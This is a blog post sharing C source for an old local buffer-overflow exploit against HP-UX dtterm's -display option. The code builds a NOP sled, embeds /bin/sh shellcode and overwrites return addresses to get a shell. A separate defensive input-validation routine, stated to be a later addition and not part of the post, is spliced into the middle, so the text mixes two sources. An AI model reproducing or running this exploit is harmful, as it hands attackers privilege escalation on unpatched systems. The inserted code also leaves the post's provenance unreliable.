[Old Exploits] dtterm HP-UX local buffer overflow in the display variable exploit

cowhat

Well, here comes an oldie but goodie: the dtterm -display option is a very old bug. My google foo did not really show me any exploits for it (I saw some bug reports about setting the DISPLAY= variable and having it crash, which I'll presume is the same bug). I don't have an HP-UX at hand; I found this in a very, very, VERY old directory while roaming around in old HDs and thought to publish it, as again I can't find any for HP-UX.

This bug is annoyingly easy, yet so hard. At first I wanted to set it up just as I set up the Linux exploits (more on that later), by execve() and so forth, but ... guess not! Anyway, this was around 2000, while I was honestly still fiddling with new techniques, browsing around and never publishing my exploits. I have removed the old header as it was holding an old handle :P keep the mystic going! LoL!

Due to my noobness the includes were written as "stdio.h", "unistd.h" and "stdlib.h"; they should be <stdio.h>, <unistd.h> and <stdlib.h> (google prettify is not kind to angle brackets, so they wouldn't "show" in the HTML but would be in the source; embedding fail).

/*
  x-dtterm-hpux.c

  XXXXXXXX
  "This bug is completely theoderaadtical"
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>   /* memcpy, strlen */

#define BUFFSIZE  3000        /* total size of the -display argument */
#define ALIGN     0
#define NOP       0x08630243  /* PA-RISC no-op used for the sled */
#define OFFSET    0
#define FIRSTJUMP 40          /* number of return-address copies */
#define RETADDR   0x7b00484c

static char shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";

/* PA-RISC: copy the stack pointer into the return register ret0 */
long get_sp(void) {
   __asm__("copy %sp,%ret0 \n");
}

int main(int argc, char **argv) {
  char c0de[4096];
  char *ch_ptr;
  char *envy;
  int aux;
  unsigned long addr;
  unsigned long addr2;
  int align = ALIGN;
  int buffsize = BUFFSIZE;
  int offset = OFFSET;
  unsigned long sysaddr;

  if(argc > 1) align = atoi(argv[1]) * 4;
  if(argc > 2) offset = atoi(argv[2]);

  ch_ptr = c0de;

  addr=get_sp()+offset;          /* guessed return address: current SP plus offset */
  addr2 = RETADDR + offset;
  addr2 = (unsigned long)c0de;   /* overrides the line above; only used in the message below */
  
  /* NOP sled: fill the front of the buffer, leaving room for the
     shellcode and FIRSTJUMP (40) four-byte copies of the return address */
  for (aux=0; aux<(buffsize - align - strlen(shellcode) - 40*4)/4; aux++) {
    *(ch_ptr++)=(NOP>>24)&255;
    *(ch_ptr++)=(NOP>>16)&255;
    *(ch_ptr++)=(NOP>>8)&255;
    *(ch_ptr++)=NOP&255;
  }

  memcpy(ch_ptr, shellcode, strlen(shellcode));

  ch_ptr+=strlen(shellcode);
  
  /* return-address block, big-endian (PA-RISC); the loop bound is
     assumed to be FIRSTJUMP, matching the 40*4 bytes reserved above */
  for (aux=0; aux<FIRSTJUMP; aux++) {
    *(ch_ptr++)=(addr>>24)&255;
    *(ch_ptr++)=(addr>>16)&255;
    *(ch_ptr++)=(addr>>8)&255;
    *(ch_ptr++)=addr&255;
  }

  /*
  for (aux=0; aux<800; aux++) {
    *(ch_ptr++)=(addr2>>24)&255;
    *(ch_ptr++)=(addr2>>16)&255;   
    *(ch_ptr++)=(addr2>>8)&255;
    *(ch_ptr++)=addr2&255;
  }
  
  */
  c0de[BUFFSIZE-1]='\0';
  
  fprintf(stderr, "return address will be %#lx shellcode is at %#lx\n", addr, addr2);

  /* the whole buffer is handed to dtterm as the -display argument */
  if(execl("/usr/dt/bin/dtterm", "dtterm", "-display", c0de, NULL) < 0) {
    fprintf(stderr, "whoa!\n");
    exit(1);
  }
  
  return 0;
}
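A defender-side counterpart, added here and not part of the original post or of dtterm: a -display value is checked for length and for `[host]:display[.screen]` syntax before anything is copied into a fixed-size buffer, so a 3000-byte argument like the one built above is rejected instead of overrunning the stack. `parse_display`, `x_display` and `DISPLAY_MAX` are names chosen for this example.

```c
#include <stddef.h>
#include <string.h>
#include <ctype.h>

/* Upper bound accepted for a -display value; a real X display spec is
 * short, while the exploit above passes BUFFSIZE (3000) bytes. */
#define DISPLAY_MAX 255

struct x_display {
    char host[DISPLAY_MAX + 1];
    unsigned display;
    unsigned screen;
};

/* Parse a decimal field of 1..5 digits, advancing *p. Returns 0 on failure. */
static int parse_num(const char **p, unsigned *out) {
    const char *s = *p;
    unsigned v = 0;
    int n = 0;
    while (isdigit((unsigned char)*s) && n < 5) { v = v * 10 + (unsigned)(*s - '0'); s++; n++; }
    if (n == 0 || isdigit((unsigned char)*s)) return 0;
    *p = s;
    *out = v;
    return 1;
}

/* Validate "[host]:display[.screen]" into a fixed-size struct.
 * Length and character class are checked before any copy, so an
 * over-long value or one carrying raw bytes (NOP sled, shellcode)
 * is refused. Returns 1 on success, 0 on rejection. */
int parse_display(const char *arg, struct x_display *out) {
    size_t len, hostlen;
    const char *colon, *p;
    if (arg == NULL || out == NULL) return 0;
    len = strlen(arg);
    if (len == 0 || len > DISPLAY_MAX) return 0;
    for (p = arg; *p; p++)
        if (!isprint((unsigned char)*p)) return 0;
    colon = strchr(arg, ':');
    if (colon == NULL) return 0;
    hostlen = (size_t)(colon - arg);          /* < DISPLAY_MAX, so it fits */
    memcpy(out->host, arg, hostlen);
    out->host[hostlen] = '\0';
    p = colon + 1;
    if (!parse_num(&p, &out->display)) return 0;
    out->screen = 0;
    if (*p == '.') { p++; if (!parse_num(&p, &out->screen)) return 0; }
    return *p == '\0';
}
```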

Hope you like it. I have HP-UX 11.11 compiled exploit binaries, either dynamic or static, but who in his right mind would just grab a binary from someone and run it? If I can get hold of an HP-UX 11.11 machine with a gcc/cc compiler I can video the compilation, get the md5 and then upload.

Anyway back to the SUNDAY SUNDAY SUNDAY!!!
